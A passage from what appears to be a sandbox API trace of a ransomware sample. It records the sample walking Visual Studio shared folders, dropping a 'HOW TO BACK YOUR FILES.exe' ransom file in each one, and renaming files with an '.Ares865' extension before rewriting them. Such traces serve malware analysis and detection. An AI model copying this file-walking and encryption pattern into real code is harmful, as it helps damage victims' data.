dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.448] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77824) returned 1 [0148.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.448] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.454] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" [0148.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0148.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0148.455] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned 90 [0148.455] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters" [0148.455] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.455] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.455] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.456] GetLastError () returned 0x0 [0148.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.456] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.456] CloseHandle (hObject=0x120) returned 1 [0148.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.456] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5863dfb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535ca1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535ca1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.457] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" [0148.457] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned 64 [0148.457] lstrlenW (lpString="Ares865") returned 7 [0148.457] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.457] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.Ares865") returned 163 [0148.457] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41408) returned 1 [0148.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.464] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" [0148.464] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll") returned 63 [0148.464] lstrlenW (lpString="Ares865") returned 7 [0148.465] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.465] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.Ares865") returned 162 [0148.465] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.467] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45056) returned 1 [0148.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.473] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" [0148.473] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll") returned 57 [0148.473] lstrlenW (lpString="Ares865") returned 7 [0148.473] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.Ares865") returned 156 [0148.473] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.addinadapter.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81920) returned 1 [0148.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.482] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" [0148.482] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll") returned 63 [0148.482] lstrlenW (lpString="Ares865") returned 7 [0148.482] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.Ares865") returned 162 [0148.482] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.484] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36864) returned 1 [0148.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.490] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" [0148.490] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll") returned 62 [0148.490] lstrlenW (lpString="Ares865") returned 7 [0148.490] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.Ares865") returned 161 [0148.490] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.word.addinadapter.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.492] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36864) returned 1 [0148.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.497] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" [0148.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0148.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0148.497] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned 73 [0148.497] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument" [0148.497] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.498] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.499] GetLastError () returned 0x0 [0148.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.499] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.499] CloseHandle (hObject=0x120) returned 1 [0148.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.499] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535ca1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535ca1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.499] lstrcpyW (in: lpString1=0x2cce494, lpString2="AddIns.store" | out: lpString1="AddIns.store") returned="AddIns.store" [0148.499] lstrlenW (lpString="AddIns.store") returned 12 [0148.499] lstrlenW (lpString="Ares865") returned 7 [0148.499] lstrcmpiW (lpString1="s.store", lpString2="Ares865") returned 1 [0148.500] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.Ares865") returned 94 [0148.500] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store.ares865"), dwFlags=0x1) returned 1 [0148.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.502] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9657) returned 1 [0148.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.506] lstrcpyW (in: lpString1=0x2cce494, lpString2="Microsoft.VisualStudio.Tools.Office.AppInfoDocument" | out: lpString1="Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned="Microsoft.VisualStudio.Tools.Office.AppInfoDocument" [0148.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0148.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xfc) returned 0x2dd710 [0148.506] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0148.506] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535f0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535f0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Office.AppInfoDocument", cAlternateFileName="MICROS~1.APP")) returned 0 [0148.506] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.506] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0148.506] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" [0148.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0148.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0148.506] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned 125 [0148.507] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument" [0148.507] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.507] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.507] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.508] GetLastError () returned 0x0 [0148.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.508] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.508] CloseHandle (hObject=0x120) returned 1 [0148.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.508] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535f0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535f0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.508] lstrcmpiW (lpString1=".", 